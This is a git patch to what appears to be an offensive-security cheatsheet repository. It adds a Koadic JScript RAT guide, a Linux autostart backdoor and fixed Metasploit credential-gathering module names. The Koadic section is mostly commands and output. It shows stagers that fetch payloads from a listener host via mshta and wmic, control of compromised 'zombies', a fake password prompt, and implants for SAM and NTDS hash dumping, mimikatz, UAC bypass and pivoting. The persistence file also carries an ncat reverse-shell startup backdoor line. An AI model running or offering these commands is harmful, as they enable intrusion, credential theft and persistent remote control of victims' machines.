From 9ebf2057c57a85caad3dfa3c7ca7fde35b9ba180 Mon Sep 17 00:00:00 2001 From: Swissky Date: Thu, 4 Oct 2018 17:35:57 +0200 Subject: [PATCH] Koadic Cheatsheet + Linux persistence in startup .desktop file --- .../Active Directory Attack.md | 4 +- .../Koadic - Cheatsheat.md | 123 ++++++++++++++++++ .../Linux - Persistence.md | 17 ++- 3 files changed, 141 insertions(+), 3 deletions(-) create mode 100644 Methodology and Resources/Koadic - Cheatsheat.md diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 4c8c305..738d062 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -117,8 +117,8 @@ Metasploit modules to enumerate shares and credentials ```c scanner/smb/smb_enumshares -windows/gather/enumshares -windows/gather/credentials/gpp +post/windows/gather/enum_shares +post/windows/gather/credentials/gpp ``` Crackmapexec modules diff --git a/Methodology and Resources/Koadic - Cheatsheat.md b/Methodology and Resources/Koadic - Cheatsheat.md new file mode 100644 index 0000000..1847be4 --- /dev/null +++ b/Methodology and Resources/Koadic - Cheatsheat.md @@ -0,0 +1,123 @@ +# Koadic C3 COM Command & Control - JScript RAT + +> Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. + +## Installation + +```powershell +git clone https://github.com/zerosum0x0/koadic +git submodule init +git submodule update +pip2.7 install -r requirements.txt --user +python2.7 koadic +``` + +## Set a listener + +```powershell +use stager/js/mshta +set LHOST 192.168.1.19 +set SRVPORT 4444 +run + +[>] mshta http://192.168.1.19:4444/6DX7f +``` + +```powershell +use stager/js/wmic +set LHOST 192.168.1.19 +set SRVPORT 4444 +run + +[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl" +``` + +### Stagers + +Stagers hook target zombies and allow you to use implants. + +Module | Description +--------|------------ +stager/js/mshta | serves payloads using MSHTA.exe HTML Applications +stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets +stager/js/wmic | serves payloads using WMIC XSL +stager/js/rundll32_js | serves payloads using rundll32.exe +stager/js/disk | serves payloads using files on disk + + + +## List zombies and interact with them + +```powershell +(koadic: sta/js/wmic)$ zombies + + ID IP STATUS LAST SEEN + --- --------- ------- ------------ + 0 192.168.1.30 Alive 2018-10-04 17:07:12 + +(koadic: sta/js/wmic)$ zombies 0 + ID: 0 + Status: Alive + First Seen: 2018-10-04 17:05:00 + Last Seen: 2018-10-04 17:14:42 + IP: 192.168.1.30 + User: DESKTOP-68URA9U\CrashWin + [...] + Elevated: No + [...] +``` + +Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`. + +```powershell +[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami +[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created. +[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed. +Result for `cd C:\Users\CrashWin & whoami`: +desktop-68ura9u\crashwin +``` + +## Use an implant + +Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`. + +```powershell +(koadic: sta/js/mshta)$ use implant/phish/password_box +(koadic: imp/phi/password_box)$ set ZOMBIE 1 +(koadic: imp/phi/password_box)$ run +Input contents: +MyStrongPassword123! +``` + +### Implants + +Implants start jobs on zombies. + +Module | Description +--------|------------ +implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10. +implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10. +implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window. +implant/fun/voice | Plays a message over text-to-speech. +implant/gather/clipboard | Retrieves the current content of the user clipboard. +implant/gather/enum_domain_info | Retrieve information about the Windows domain. +implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive. +implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file. +implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X). +implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). +implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). +implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed). +implant/manage/enable_rdesktop | Enables remote desktop on the target. +implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output. +implant/phishing/password_box | Prompt a user to enter their password. +implant/pivot/stage_wmi | Hook a zombie on another machine using WMI. +implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals. +implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN. +implant/utils/download_file | Downloads a file from the target zombie. +implant/utils/multi_module | Run a number of implants in succession. +implant/utils/upload_file | Uploads a file from the listening server to the target zombies. + +## Thanks + +- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/) +- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index dcc068f..a0ad6ab 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -41,7 +41,6 @@ fi rm /tmp/$TMPNAME2 ``` - ## Backdooring a startup service ```bash @@ -49,6 +48,22 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null" sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart ``` +## Backdooring an user startup file + +Linux, write a file in `~/.config/autostart/NOM_OF_FILE.desktop` + +```powershell +In : ~/.config/autostart/*.desktop + +[Desktop Entry] +Type=Application +Name=Welcome +Exec=/var/lib/gnome-welcome-tour +AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide +OnlyShowIn=GNOME; +X-GNOME-Autostart-enabled=false +``` + ## Backdooring a driver ```bash